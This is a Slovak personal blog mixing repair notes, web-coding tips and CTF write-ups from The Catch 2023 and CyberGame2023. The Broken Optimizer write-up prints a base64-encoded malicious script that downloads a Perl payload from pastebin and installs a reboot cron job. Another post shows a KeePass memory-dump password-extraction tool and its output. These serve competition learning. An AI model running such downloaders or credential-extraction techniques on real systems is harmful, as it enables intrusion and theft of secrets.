Oprava - umývačka Bosch neumýva v spodnej časti

 Umývačka niekoľko mesiacov stále horšie umývala v najspodnejšom koši. Najskôr po okrajoch, neskôr aj uprostred. Vodný kameň nevidieť, čistiaci prostriedok a vyššia teplota nepomáha. Spodná vrtuľa nevisí ako tie hore, ale stojí. Do spodnej časti ("ložiska") sa nazbierala špina, možno práve drobný vodný kameň / piesok a vrtuľa sa ani rukou takmer nedala otočiť. Stačilo vybrať a poumývať. Opäť umýva ako nová.

Ešte si tak zapamätať, že po chybne zadanom programe sa vynuluje dlhým podržaním tlačidla štart.

spodná vrtuľa potrebuje občas prečistiť ložisko

CTF - The Catch 2023 - Záver

 Tématicky a zaujímavo poňatá hra podporujúca mesiac počítačovej bezpečnosti prebiehala v dňoch 2 až 23 októbra (3 týždne). Zaujímavé úlohy sa mi podarilo v čase súťaže vyriešiť v počte 13 z 20 a s pozíciou do prvých 100 účastníkov som spokojný vzhľadom na relatívne nízky pomer času. Nesúťažne som pridal ďalšie 2 úlohy.

Keďže blog je fajn miesto na zdieľanie informácií, spísal som, ako aj v prípade minulej CTF hry Cybergame svoje vyriešené úlohy, po jej ukončení.

Po skončení súťaže sa otvorila na 2 týždne súťaž pre najlepšie spísané postupy (write-ups) a tak som zaslal link. Síce sa vymykám štandardným postupom v gitlabe, ale možno práve vďaka tomu som v tejto súťaži uspel.

darčekový predmet - SmartCard od Victorinox

Ďakujem, Cesnet.

CTF - The Catch 2023 - Cat Code

 Aj na modernej lodi CNS Josef Verich sa prejavil nedostatok IT vývojárov. Vďaka tomu sa dostal vývoj generátora prístupových kódov pre satelitné pripojenie na plecia mačky hlavného dôstojníka. Máme zdroják v Pythone a úlohu dopátrať kód. Dostávame radu, že síce mačky sú veľmi milé, štúdie ale preukázali, že nie sú dobrými vývojármi.

Máme dva súbory používajúce okrem pythonu prevažne mačacie názvy:

• meow.py - knižnica s funkciami meow a meowmeow
• meowmeow.py - hlavný program

Moje začiatočnícke vedomosti jazyka Python sa aspoň rozšíria analýzou tohto kódu, ale bude to otravné pre vás, čo ho ovládate :-)

CTF - The Catch 2023 - Component Replacement

  Naša loď musela znížiť svoju rýchlosť, pretože sa jej pokazila súčiastka "zvyšovač efektivity paliva".  Pre objednanie správneho dielu potrebuje hlavný inžinier presný identifikačný kód dielu. Avšak niečo sa stalo a nemôže sa dostať na webový výpis použitých dielov. Pravdepodobne to súvisí s nedávnou zmenou sieťových adries v strojovni. Stará sieť bola pre celú loď 192.168.96.0/20. Nájdime číslo dielu. Stránka je dostupná na adrese: http://key-parts-list.cns-jv.tcc

Ako pomôcku dostávame radu prekonať IP filter.

Čo teraz? Pre-IPčkovať svoju domácu sieť som nechcel. Treba sa zamyslieť, ako obabrať identifikáciu IP...

CTF - The Catch 2023 - Captain's password

Kapitán si dal priveľa námorného pressa a dostal sa tak dočasne mimo službu. Prvý dôstojník je síce vo velení, ale nepozná kapitánove heslo pre lodné systémy. Dobrá správa je, že kapitán používa manažér hesiel a dôstojník našiel kapitánov pamäťový dump po páde systému.

Po stiahnutí a rozbalení vyše 1GB veľkého súboru (a súboru manažéra hesiel captain.kdbx) bolo jasné, že ide o Keepass. Keepass má nedávno zverejnenú (v 2.54 opravenú) zraniteľnosť, ktorá umožňuje vytiahnuť väčšinu písmen z master password (hlavné heslo do keepass súboru) z pamäte, kde sú časti s bodkami a jedným písmenom, ako sa heslo postupne zadáva do políčka ručne po písmene.

Skúsil som python verziu z tejto adresy na githube. Heslo, ktoré dopátral pod linuxom za cca 5min je (doplniť "p"): 

$ python3 poc.py -d crashdump.dmp
2023-10-21 23:14:15,589 [.] [main] Opened crashdump.dmp
Possible password: ●)ssword4mypreciousship
Possible password: ●assword4mypreciousship
Possible password: ●:ssword4mypreciousship
Possible password: ●|ssword4mypreciousship
Possible password: ●Wssword4mypreciousship
Possible password: ●5ssword4mypreciousship
Possible password: ●rssword4mypreciousship

Položka main flag system obsahuje vlajku ako heslo: FLAG{pyeB-941A-bhGx-g3RI}

CTF - The Catch 2023 - Naval chef's recipe

Niektorí z posádky lode sa po zjedení špeciality dňa začali chovať zvláštne - mali halucinácie, pretože hovorili o zavíjaní sirén, o Krakenovi a podozrievali kuchára, že je reptiliánsky špión. Kuchár nechce prezradiť tajnú ingredienciu, ale pozná len "security by obscurity", takže to nebude ťažké. Za 2 body.

Keď pozerám stránku chef-menu.galley.cns-jv.tcc, je tu menu 3 rôznych pochutín:

• rybací tacos
• burger
• kuchárov šalát

Nič podozrivé v kóde nie je, okrem počtu porcií a obrázku mačky so slovami, že špecialitu neprezradí.

Skúšal som rôzne parametre obrázka aj ho prehľadávať cez cyberChef alebo Gimp, bez úspechu, bola to len slepá ulička, opäť mačka.

Po preskenovaní portov našiel len 80 a 443. Port 80 (http) okamžite automaticky presmeruje na 443 (https) s textom "the document has moved here" a teda neprišlo mi to podozrivé.

Napokon ma napadlo stiahnuť cez wget nezabezpečenú verziu http stránky (sladená sušená mandragora s vitamínom C a štipkou L5D):

<html><head>
  <title>301 Moved Permanently</title>
  <meta content="0;url=https://chef-menu.galley.cns-jv.tcc" http-equiv="refresh"></meta>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://chef-menu.galley.cns-jv.tcc">here</a>.</p>
<p style="display: none;">The secret ingredient is composed of C6H12O6, C6H8O6, dried mandrake,
FLAG{ytZ6-Pewo-iZZP-Q9qz}, and C20H25N3O. Shake, do not mix.</p>
<script>window.location.href='https://chef-menu.galley.cns-jv.tcc'</script>
</body></html>

CTF - The Catch 2023 - Keyword of the day

 Jeden z kadetov dostal jednoduchú úlohu pripraviť jednoduchú webovú aplikáciu pre oznámenie kľúčového slova dňa. Tvrdí, že sa mu to podarilo, ale zabudol číslo portu na ktorom beží. Pre potreby bezpečnosti vytvoril aj veľa fake aplikácií. Nájdime teda kľúčové slovo, aby mohla posádka vykonávať ďalej svoje práce. Úloha je za 4 body.

Ahoy, officer,

one of deck cadets (remember your early days onboard) had a simple task to prepare simple web application to announce keyword of the day. He claimed that the task is completed, but he forgot on which port the application is running. Unfortunately, he also prepared a lot of fake applications, he claims it was necessary for security reasons. Find the keyword of the day, so daily routines on ship can continue.

CTF - The Catch 2023 - Web protocols

Ďalšia úloha z drillovania posádky za 2 body. Tento výcvik sa zameriava na webové protokoly. Vieme len virtuálnu adresu a že na nej bežia viaceré weby, ktoré potrebujú správnu komunikáciu a z odpovedí vyskladáme vlajku.

Ahoy, officer,

almost all interfaces of the ship's systems are web-based, so we will focus the exercise on the relevant protocols. Your task is to identify all webs on given server, communicate with them properly and assembly the control string from responses.

CTF - The Catch 2023 - Sonar

Zo sekcie drillov pre posádku tu máme za 2 body "Sonar logs". Každý člen posádky by sa mal vyznať v logoch sonaru, preto je tu úloha zistiť, čo sonar videl.

Ahoy, officer,

each crew member must be able to operate the sonar and understand its logs. Your task is to analyze the given log file, and check out what the sonar has seen.

May you have fair winds and following seas!

CTF - The Catch 2023 - Navigation plan

Prvý dôstojník bol pozvaný na námornícke presso kapitánom (ako už vieme z API ponuky kávomatu, obsahuje tvrdý alkohol). Teraz sú obaja nespôsobilí služby. Druhý dôstojník je veľmi zaneprázdnený a požiadal nás o kontrolu, kam smerujeme podľa navigačného plánu.

Navigačný plán je na VPN stránke http://navigation-plan.cns-jv.tcc

Po zobrazení stránky v prehliadači vidím 3x3 mriežku s mapami (PNG obrázky) s popismi umiestnenia, prázdnymi políčkami RAW a tlačidlami pre detaily. V hlavičke stránky je login formulár a popis, že detaily vidí iba kapitán a prvý dôstojník.

Musím teda zistiť ako sa dostať k detailom, buď zistením loginu a hesla kapitána alebo dôstojníka, alebo priamo načítaním daného obrázka či textu z webu nejakou fintou.

CTF - The Catch 2023 - Apha-Zulu Quiz

Prvá úloha do ktorej som sa pustil má názov Apha-Zulu quiz (mysleli alpha? ako vojenská abeceda). Je v sekcií pre drill posádky. Je to vlastne súbor otázok a 4 možností odpovedí. Nachádza sa na virtuálnej adrese http://quiz.cns-jv.tcc. 

Opýta sa 20 náhodných otázok "Čo je tento blok dát?". Očakávaný je teda prehľad vo výzore rôznych typoch dát.

Odpovede a moje zdôvodnenie som zahrnul z pravej strany malým písmom, pre prípadný záujem vyskúšať si to. Je všetko správne? Ťažko povedať, žiadny iný výstup okrem vlajky som sa nedozvedel.

CTF - The Catch 2023 - intro

 Prvý októbrový pondelok, mesiac IT bezpečnosti, začala capture-the-flag súťaž "the Catch". Organizuje ju CESNET, teda akademická a vedecká sieť (ako náš SANET). Doba trvania 3 týždne. Prvý krát prebiehala v r.2017, ide teda už o siedmy ročník.

Registrácia bola jednoduchá, na stránkach thecatch.cz stačilo zadať prezývku, mail a heslo, mail potvrdiť a mohli sme začať.

0. Introduction (0 bodov)

Privítanie na vlajkovej lodi plnej sieťových technológií. Nesie meno Josef Verich na pamiatku kolegu, sieťového guru. Pokiaľ máme záujem stať sa kadetom, stačí prepísať vlajku:
FLAG{fV5C-iTZb-NtNC-E4lw}

Oprava - Emos UNI D3 (N0322) univerzálny tester batérií

Prístroj Emos UNI D3 meria batérie AAA,AA,C,D, gombíkové a na zvlášť kontaktoch aj 9V. Na displeji ukazuje 3-ciferné napätie s dvomi desatinnými číslami, napríklad 1,52V. Na zadnej strane je tabuľka podľa ktorej môžeme určiť stav batérie:

• Good > 1,3V  ( > 7,8V)
• Low 1,15 - 1,3V  (6,3 - 7,8V)
• Replace < 1,15V  (< 6,3V)

Opravovaný kus neukazoval na displeji nič. Po rozobraní som objavil malý plošný spoj, ktorý obsahuje hlavný procesor merajúci napätie a budiaci LCD displej. Ďalej je tu v závislosti na použití 9V, alebo 1,5V batérie urobené ako meranie, tak napájanie obvodu rôznymi súčiastkami.

Oprava nabíjacieho USB-C kábla

Ako sa technika vyvíja, konektory sa menia, najslabšie miesta ostávajú. Pacient je 3m nabíjací kábel pre mobily GooBay 59132 od Wentronics. Opatrne som ostrým odlamovacím nožom odrezal po stranách gumenú pružnú krytku USB-C konektora, čo sa ukázalo ako príčina problému.

Utrhnutý hrubý mínus drôt mal na konci plôšku z plošného spoja. Napriek prekovu nevydržal pružné zachádzanie a utrhol sa.

Naspájkoval som ho z opačnej strany, našťastie dizajnér plošný spoj vybavil kontaktami na oboch stranách. Následne prišla na rad taviaca pištol a konektor je teraz pevnejší ako od výrobcu a tak chvíľu ešte poslúži.

Spojazdnenie Microsoft SQL-Server konektivity v XAMPP

XAMPP - multiplatformový (windows,linux) balíček pre lokálny vývoj webových aplikácií. Obsahuje Apache web server, v ňom PHP funkcionalitu, Perl a prípadne doplnky ako MariaDB databázu, FileZilla FTP server, mailovú službu Mercury a aplikačný server Tomcat.

Môže byť výhodné pri tvorbe webovej aplikácie, mať rozbehaný lokálne XAMPP a dodávať na server už odladenejšie verzie súborov. XAMPP dovoľuje následne po inštalácií cez kontrolný panel spúšťať a zastavovať jednotlivé komponenty. Nemá teda permanentné nároky na hostiteľský počítač.

Pre rozbehanie konektivity z PHP na microsoft SQL server databázy je potrebné trochu mu pomôcť, tu je stručný postup:

• stiahnuť zo stránok microsoftu PHP driver pre SQL server SQLSRV511.ZIP (aby PHP poznal sqlsrv_* príkazy)
  https://learn.microsoft.com/en-us/sql/connect/php/download-drivers-php-sql-server?view=sql-server-ver16
• stiahnuť msodbcsql.msi inštalátor (aby sa mal PHP ako pripojiť)
  https://learn.microsoft.com/en-us/sql/connect/odbc/download-odbc-driver-for-sql-server?view=sql-server-ver16

Zo súboru SQLSRV511.ZIP rozbalíme DLL súbor do XAMPP\php\ext\ cesty ku ostatným driverom. Ja konkrétne nepoužívam PDO, tak som potreboval len súbor (mám PHP8.2, 64bit):

php_sqlsrv_82_ts_x64.dll

Ďalej som tento driver pridal do nastavení XAMPP\php\php.ini , našiel pgsql a pridal zaň riadok:

extension=sqlsrv_82_ts_x64

Zdrojové kódy pre lokálne vyvíjaný web (localhost adresa v browseri) sa umiestnia v XAMPP\htdocs, prípadne podadresároch.

CTF - CyberGame2023 - Mysterious Application

Túto tému som síce neprešiel, avšak dešifrovanie prvej úlohy bez jej spustenia mi dalo celkom zabrať. Tu je výsledok snaženia, pochopenie tohto konkrétneho typu obfuskácie.

1. Way in

Viacerí ľudia hlásia záhadnú aplikáciu vo svojom telefóne, po prvej analýze sme zistili, že v ich systéme bol v jednom zo súborov hash sum mismatch.

Tu máš súbor na analýzu. https://drive.google.com/file/d/.....

Stiahnem a rozbalím zo súboru ldd.tar súbor ldd. Vyzerá to byť klasický ldd shell skript, ktorý je súčasťou linuxových distribúcií. Vypisuje zdieľané knižnice (.so súbory), ktoré program zadaný ako parameter používa.

Tento skript má však na konci pridanú obfuskovanú funkciu "fun".

CTF - CyberGame2023 - Phishing

Táto úloha je taká všehochuť, hlavne o orientovaní sa na webe (viaceré sociálne siete). Pre vyriešenie je potrebné sa registrovať do aplikácie Telegram, ktorá vyžaduje telefónne číslo. 

Boli ste cieľom phishingovej kampane. Rozhodli ste sa túto kampaň zanalyzovať.

Reported Difficulty: 1

CTF - CyberGame2023 - Configuration

Tento scenár je na jednej strane veľmi praktický, reálne cvičenie ako si skontrolovať a vylepšiť zabezpečenie svojho linuxového stroja - Hardening.

Na druhej strane je odpovedanie trochu zložité a nemusí sa podariť na prvý pokus. Niekedy stačí prepnúť jeden parameter, ktorý znefunkční viaceré iné, zle nastavené. Inokedy je v jednej odpovedi veľa rôznych nastavení.

Ste adminom web servera a prišlo Vám niekoľko požiadavok ohľadom zmien konfigurácií.

Prikladáme celé /etc/ (súbor configurations.tar)
https://drive.google.com/file/d/1DtMrIe4i9Bn1UITyYEUZc_Je8QSDylb8/view?usp=share_link

Taktiež prikladáme zoznam súborov ktorý budete potrebovať pre vaše odpovede. V tomto súbore nájdete všetky súbory z /etc/ s príslušnými číslami. (súbor file_list.txt)

https://drive.google.com/file/d/1tmNtsSdnloLi-RyATmTMb_FKzd21Aiz1/view?usp=share_link

Reported Difficulty: 1

CTF - CyberGame2023 - Broken Optimizer

 V tomto sсenári prejdeme viacerými shell jazykmi a preto som po ňom siahol ako po prvom. Odhalíme viac krát obfuskovanú podvodnú aplikáciu.

1. Optimizer

Používateľ v tvojej firme si nainštaloval tento software, aby si zvýšil výkon PC, ale miesto toho sa mu počítač začal správať divne. Zisti, čo sa stalo.

Stiahneme z uvedenej linky súbor optimizer.sh :

#!/bin/bash
echo "IyEvYmluL2Jhc2gKIyBTSy1DRVJUe2QzZjFuMTc3M2x5X24wN18wcDcxbTF6M3J9Cm1rZGlyIC9v
cHQvb3B0aW1pemVyLwp3Z2V0IC1PIC9vcHQvb3B0aW1pemVyL2luc3RhbGxlci5wbCBodHRwczov
L3Bhc3RlYmluLmNvbS9yYXcvUWdqVHF0VlEKZWNobyAiQHJlYm9vdCBwZXJsIC9vcHQvb3B0aW1p
emVyL2luc3RhbGxlci5wbCIgPj4gL2V0Yy95b3VyX2Nyb250YWJfZmlsZQo=" | base64 -d

Vidieť, že má svoj kód maskovaný cez base64 (z kódu som zámerne zmazal na konci presmerovanie do bash).

CTF - CyberGame2023 - Steganography

Steganografia - tajná správa je schovaná v správe / informácií verejnej, bez toho aby si ju bolo možné na prvý pohľad všimnúť.

V obľube tohto scenára sú obrázky s informáciou schovanou na všetky spôsoby. Zadania v postupnosti akej ich bolo potrebné vyriešiť.

1. Bus

ilustračný obrázok autobusu (neobsahuje šifru)

2. Snow

3. White noise

Súčasťou tohto zadania sú dva obrázky.

4. Secret message

5. PDF mystery

PDF sem neviem zavesiť, tak aspoň všeobecne ako vyzeralo (z tohto obrázku sa nepodarí kód dešifrovať).

ilustračný obrázok PDF súboru

a riešenia...

CTF - CyberGame2023 - Breaking Encryption

Scenár "breaking encryption" je celý o šifrách a výdatne pri dekódovaní pomôžu ako CyberChef, tak iné stránky.

Najskôr vstupy, ak chcete prísť na riešenie sami, v súťaži bolo potrebné poradie dodržať, aby sa odkryla ďalšia úloha.

1. šifra

Irop·rpt·h(ooa·mt·h·at·eyoh·aehoi·cartsiniuhitcarhesrpt·h·r·tfae(ilhcs·uohcscd·agrs·puapt·cspuiohlt.tVlir-T1nz4ncytgah,atasoiincpe·as·nw·sapruaincpe)i··ehdo·nrpinwihsrmlstepstoso·hrces(rnpsto)wtotcagn·h·hrcestesle.Tasoiincpesrodruiso·litx·tpclycaatr·rgop·fcaatr)acrigt··eua·ytmt·rdc··ihretwihi··emtto·ftepanet·o··ibeCpe·KCR{4l3c_1sg·pry·nsoirlkn·etoirsmofct·ccb··infat·aoi·h·ngeat·mv·nsoireen·pntya·reors·re·onorlseooecexh·aran··ixNAa·hSErf3g}

2. šifra - Dot type

⡎⡅⠤⡉⡑⡗⡞⣷⠗⠩⠹⠙⠡⠝⠛⢂⠃⠗⠹⠡⠇⠇⠩⢂⠉⠬⠙⠩⣾

3. šifra - Vigenérova šifra! Pusti sa do práce!

C dppfgl1l216mk0 dm6ne3 wm1kmkhvxzun, 6wad8 fw9um6re 4y3ilbvium5t axt9037vg. Ulv 1isif4j7 e6qlvx i4 tje33d9z xyk bqwl-afhyb f1rspxi g5 2 iq9ze2vhmf6ja5 e6qlvx, ttsm69 bv 6t e 9om1pa5a7f gqitoax g2i6. LM-0FVA{y1ytdt_nuiro789_cdt9tj}

4. šifra - Dostal si sa už naozaj ďaleko. Zvládneš aj túto výzvu? Jedná sa o bifid, s kľúčom o dĺžke 3 znaky.

Soeafapthtg lpbqegweesfk np t htglte gr emrkn l lteufnf llqlqemrhtef er omomkhbbq qr pbtegb np kebqegw. Ehba llt epbtaq tq bpf cqeac mb tsoeafapthtg kmpat, wqmm rqchekq nltaq tqm qofb: gbw arltepbs, f kmypth te ksorq cheta qt qmqofbg bwa rltepbtaqtq bk ffbnvybqk. Gg n fesqqmg, qhitkepfebq ebrllewsnavo guuuyxpvp oqua uuimoguuuyxclx (kz qicofa) pmhatbanuhpfv dm cdiaf puhokrcxar msdkwxy ntc pvpoquaax ofapmsrwnyy, dx impuandpcpwsna voguuuydtnnly sy yeteu dmxbrwnyyz syhvuuv zyf apmsduimhog uu pzkwteteu rwny yzsyhvuuv zy fapms rwnyydyz fr aqt ocaz. SY-TDKX{yzutppnkcniivvpktfak}

5. šifra  - Nevzdávaj to pred koncom! Použili sme XOR, ale zabudli sme heslo. Formát je v HEX.

15 2b 3c 62 1d 1d 15 61 22 35 24 33 22 2d 2d 37 72 2e 32 6d 20 39 35 31 3c 2f 20 3e 3e 61 2e 2a 2c 2c 2c 37 62 24 21 67 20 6d 26 2e 2c 33 36 2c 20 3c 33 61 24 2b 61 2c 2c 2b 27 65 31 28 2c 3d 29 24 39 63 3a 2b 35 3a 22 33 3e 6b 61 03 3a 79 2b 31 21 22 2d 2b 69 61 34 30 30 2c 22 72 26 61 2e 2a 2f 32 37 38 2c 31 72 35 24 3d 20 20 35 2a 37 25 65 39 22 38 61 65 20 61 30 30 2f 35 3e 22 61 15 0a 13 61 20 30 32 2d 37 35 61 2e 24 2f 61 37 2b 2b 33 3b 26 2d 21 3c 61 23 26 79 20 37 3d 2c 24 23 65 34 32 2a 37 25 65 34 35 24 3c 30 24 2f 20 20 62 24 3c 26 2d 34 36 28 32 6d 79 0b 23 72 33 29 28 65 22 2e 2d 2d 27 2b 26 67 2e 2b 65 20 2f 3a 79 2f 20 21 34 20 2a 20 61 22 22 37 62 27 37 67 26 38 20 32 32 26 3d 62 2a 20 67 2e 39 2d 24 33 34 30 31 20 72 2c 2f 22 32 2f 61 37 31 27 2b 72 33 29 28 65 2a 24 3a 79 21 24 3c 67 23 28 65 33 24 35 3c 23 29 37 23 6f 6d 0c 35 32 63 29 30 2c 3f 26 33 34 65 2c 24 31 30 36 65 3b 34 61 39 2d 20 35 63 30 36 65 3b 34 61 3e 2c 2c 31 2f 3c 62 31 3d 67 28 20 35 2d 24 2e 3c 2c 31 7e 67 20 23 21 61 35 2b 38 36 65 26 2f 24 6d 1d 0e 13 63 36 32 20 20 26 35 24 2a 2f 61 2a 2a 62 26 3d 2a 31 38 31 20 35 2a 36 2c 24 3e 2b 38 6d 2c 2f 24 3b 29 27 2b 21 2e 37 28 6b 4b 09 26 35 2e 2a 72 21 33 22 28 61 12 2f 36 34 24 39 2e 20 6c 65 12 0a 6e 1a 07 17 06 3c 23 3f 30 76 72 25 69 30 26 63 29 26 12 3d 71 33 3e

riešenie tu..

CTF - CyberGame2023 - AirGapped - VideoTape

CyberGame 2023, druhý ročník tejto súťaže s rébusmi z informačnej bezpečnosti organizovanej SK-CERT prebiehal 10 týždňov v termíne 1.marca - 10.mája 2023. Bol to môj prvý pokus, ak nerátam podobnú jednoduchšiu verziu kedysi organizovanú firmou ESET. Času veľmi nebolo, tak som robil len pre mňa jednoduchšie úlohy.

Zápisok z posledného riešeného hlavolamu..

Scenár Air Gapped

Naše dohľadové centrum (SOC) spĺňa tie najvyššie bezpečnostné štandardy. Dáta z monitorovaných systémov prúdia dnu dátovou diódou. Keďže prostredie je takto oddelené, bezpečnostné aktualizácie nie sú potrebné. Je predsa nemožné, aby došlo k akémukoľvek incidentu či úniku informácií. Že?

Dnes ráno sa však stalo niečo hrozné.

Reported Difficulty: 3

 úloha 2: VideoTape

Zdá sa, že zlé správy nekončia. Nejaké dáta predsa len unikli. To sme považovali za nemožné! Máme sabotéra? Keď sme preverili kamerový záznam, nikto za serverom nesedel. No veď posúďte sami… https://drive.google.com/file/d/.... Flag je v štandardnom formáte SK-CERT{xxx}.

Záznam bezpečnostnej kamery odhalil len blikanie LED klávesnice

Po prezretí 550MB 3,5min HD videa vo formáte MP4 som zistil, že únik dát prebiehal cez LED na klávesnici.

Linky - Kam nahlasovať podvodné stránky

Kópa webu internet bankingu, falošná stránka s platbou za balík kuriérovi, a iné podvodné linky chodia nie len do mailových schránok, ale aj SMSkami.

Ak máme istotu, že ide o podvod, ideálne je danú stránku nahlásiť do zoznamov, ktoré kontrolujú prehliadače.

https://safebrowsing.google.com/safebrowsing/report_general/
Google SafeBrowsing - chrome, firefox, safari, vivaldi, brave

https://phishtank.org
PhishTank - opera, mozilla, kaspersky, avira, mcafee, 

https://www.microsoft.com/en-us/wdsi/support/report-unsafe-site
microsoft

https://www.youtube.com/watch?v=0fIUiv9-UFk
ThioJoe s tématikou blokovania podvodných webov - ďalšie linky v popise videa.

Zdarma rozšírenie pre chrome browser, umožňujúce aj nahlasovať podvodné stránky - netcraft.

Rozbor - Power Banka - hranatá s tlačidlom

Pokazená power banka - hranatá s tlačidlom, podobnú kedysi rozdával Telecom k paušálom.

Po zapojení na nabíjačku sa tvárila funkčne - červené svetielko nabíjania, po stlačení tlačidla modré svetielko výstupu. Ale po odpojení zhasla a nefungovala.

Pre rozobratie treba odlupnúť nálepku s popismi konektorov, v rohoch sú 4 krížové skrutky. Po vybratí predného krytu ide zvyšok vysunúť do zadu.

Oprava - minecraft fakľa

Plastová napodobenina fakle z hry Minecraft. Blikala a blbla podľa nárazov.

Minecraft fakľa

Táto fakľa pre fanúšikov hry Minecraft používa 3ks AAA batérií. Pri bežnom svietení berie prúd cca 50mA. Jednu dobu fungovala po podložení hrubšej vrstvy alobalu pod kryt batérií, teraz to už ale nestačilo, čas na rozobratie.

Oprava - Canon LBP6000 nedetekovaná

 Malá domáca laserová tlačiareň Canon LBP6000 sa nedala inštalátorom tlačiarne detekovať. Kábel v USB Type-B na strane tlačiarne sa zdal dosť voľný a tak som tlačiareň rozobral.

USB typ-B na tlačiarni - zatlačený pin dovnútra plastu

Po rozobraní som zistil, že konektor drží pevne a nie je ani nijak polámaný. Avšak jeden pin.. čo teraz?

Oprava - vláčik Lego Duplo 10874

Vláčik Lego Duplo Push&Go prestal jazdiť, najskôr po posunutí len na sekundu zavrčal, neskôr nastalo úplné ticho. Myslel som si, že nabral vlasy do prevodov, keďže kolesá šli ťažko, tak som pozrel dnu.

Lego Duplo Push and Go 10874

Vláčik rozoznáva na koľajniciach položené farebné značky a podľa nich reaguje (naplnenie vody, zastávka v stanici, trúbenie, blikanie, zmena smeru).

Senzor aj sníma, či a ktorým smerom sa vláčik hýbe a podľa toho prípadne na prekážke, alebo po dvihnutí z trate zastaví. Rozbehne sa položením a potlačením. Navyše ide vláčik ovládať aj mobilnou aplikáciou.

Nafúknutá batéria notebooku

Notebooky sú tenšie a batérie 18650 sa z nich vytratili. Nafukujúce batérie útočia tak, ako to poznáme z telefónov. Vytrácajú sa vymeniteľné a prevládajú zabudované. Občas si skontrolujte, či sa vám NB nezačína guľatiť.

Javascript - AJAX načítanie časti obsahu stránky z iného zdroja

Pre dynamické zmeny na stránke bez jej obnovenia je možné použiť načítanie obsahu externej stránky javascriptom a jeho vloženie do existujúcej.

Výhodné je to použiť napríklad pre obnovovanie stavovej informácie, prípadné paralelné načítanie viacerých informácií.

Kód html, dole span prvky budú mať prepísaný obsah z externých stránok:

<html>
<head>
 <script type='text/javascript' src='tabulka.js?v=2'></script>
 <style>
.grida2 {
    display: grid;
    grid-template-columns: auto auto;
    max-width: 980px;
#    margin: auto;
}
.grida2 > div {
  margin: 0px;
  padding: 0px;
}
 </style>
</head>
<body>
<div class="grida2">
 <div> <span id='OBS1'>nacitavam tabulku1.. </span> </div>
 <div> <span id='OBS2'>nacitavam tabulku2.. </span> </div>
</div>
</body>
</html> 

Je tu použitý CSS grid, pre zobrazenie dvoch stĺpcov s obsahom vedľa seba.

Javascript zabezpečí prvé načítanie a pravidelné obnovovanie obsahu:

var MyTimer		= null;
var MyPocetSecund	= 31;

function requestHttp(url,nazovObj)
{
    var request = null;
    try {request = new XMLHttpRequest();}
    catch(e) {
        try {request = new ActiveXObject('Microsoft.XMLHTTP');}
        catch(e) {request = null;}
    }
    if(request == null) { return; }
    request.onreadystatechange = function()
    {
        if (request.readyState == 4)
        {
            if (request.status == 200)
            {
                document.getElementById(nazovObj).innerHTML = request.responseText;
            }
        }
    }
    request.open('GET', url, true);
    request.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
    request.setRequestHeader("Expire", "now");
    request.setRequestHeader("Pragma", "no-cache");
    request.send(null);
}

function RefreshStranky()
{
	url1 = 'obsp1.php';
	url2 = 'obst1.php';

	requestHttp(url1,'OBS1');
	requestHttp(url2,'OBS2');

	MyTimer = window.setTimeout('RefreshStranky();',(MyPocetSecund + Math.floor(Math.random() * 5 ))*1000);
}

RefreshStranky();

Novšia možnosť je sťahovať obsah cez fetch-API:

async function getData(url2,nazovObj2){
       const response= await fetch(url2);
       const data= await response.text();
       document.getElementById(nazovObj2).innerHTML=data;
     }

Ako odhaliť vadný kondenzátor v spínanom zdroji bez rozoberania

Je možné odhaliť na zvarenom napájacom adaptéri prenajatého internetového routera, že má vadné kondenzátory? Ako sa prejavia?

Oprava - ochladzovač vzduchu - vypadnuté lamely smerujúce vzduch

 Po dlhodobom odložení som sa pustil do čistenia chladiča vzduchu LH300 od Somogyi Electronic. Po vyumývaní povrchu som zistil, že sú lamely ktoré smerujú vzduch stlačené do strán. Po narovnaní stále nevyzerali, že ich niečo drží - bolo potrebné pozrieť sa dnu, čo nebolo také jednoduché.

celý chladič vzduchu

SVG graf - vektorový obrázok priamo v html kóde

 Chcel som nahradiť komerčnú knižnicu kresliacu grafy v PHP a napadlo ma skúsiť to najskôr vlastnými silami. Ako možnosti mi vyskočili "canvas" zo štandardu HTML5 a SVG. Kým prvé generuje klasické bitmapové "obrázky", to druhé je zaujímavé pre svoju kompatibilitu.

SVG je vektorový formát obrázkov, vyvíjaný W3C (XML zápis), ktorý je tu už cez 20 rokov, webové prehliadače ho preto dobre poznajú. Bol vyvíjaný aj pre web, prehľadným XML zápisom umožňuje vkladanie aj priamo do HTML kódu stránky.

Pre vkladanie do kódu použijeme "svg" tag, rovnako ako prípadného externého do .svg súboru:

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 640" width="640">
</svg> 

Parameter viewBox nastaví aké súradnice chceme zobraziť. Vieme tak spraviť výsek z obrázku, zoom, alebo upraviť jeho okraje. 

Až po nastavení tohto parametra vie pre width a height parameter prepočítať rozmery.

Táto minimalistická hlavička sa mi osvedčila, plnohodnotnú hlavičku nájdeme napr. tu https://www.w3.org/TR/SVG11/struct.html#NewDocument

Spravme si funkciu pre koláčový graf..

Rozbor - NiMh batérie Songpus 4700mAh (AA)

 S blížiacimi sa Vianocami nastal po rokoch čas pre dokúpenie nabíjateľných článkov AA. Kým bežné značky idú za ceny 2-4€ za kus, pri kapacite 1900-2600mAh, máme tu rekordéra 4700mAh za necelých 1,40€, batérie Songpus.

Vravím si - píšu o najmodernejšej technológií, sú extrémne ľahké, možno používajú lítium 😀 Tak som ich hodil do nabíjačky na test režim a vyšlo mi okolo 620mAh. Ďalší cyklus to stúplo na čosi mierne cez 700. V treťom cykle sú všetky okolo 680-770mAh, jedna má vnútorný odpor okolo 43mohm, zvyšné 82mohm.

Songpus 4700mAh NiMh

Na fake batérie som si už na čínskych stránkach zvykol, pri lítiových 18650 článkoch rôzne farebné nápisy s vymyslenými kapacitami. Že sa raz dopracujú aj na slovenské shopy v podobe AA/AAA batérií ma nenapadlo. Vyzerá že sú nové, vďaka nárastu kapacity po prvých dobitiach, avšak vďaka váhe, kapacite a vnútornému odporu veľmi oklamané voči známym značkám. Ak by som porovnával LADDA batérie za 2€ s týmito za 1,40€, povedal by som že ma číňan úspešne oklamal a zarobil na mne ďaleko viac ako západniar. Nekupovať.

Danyk spravil aj vnútorný rozbor podobných nepodarkov (https://danyk.cz/test_aku.html) SDNMY bude pravdepodobne od rovnakého výrobcu, avšak s menšou kapacitou na obale.

Oprava - roztrhnutá vianočná reťaz na batérie s časovačom

 Minule pes a teraz zlodej. Po odmotaní zhruba 40ks LED to vzdal a reťaz roztrhal. Našťastie zistil, že taká roztrhnutá nesvieti a tak ju rovno zahodil a vzal len batérie.

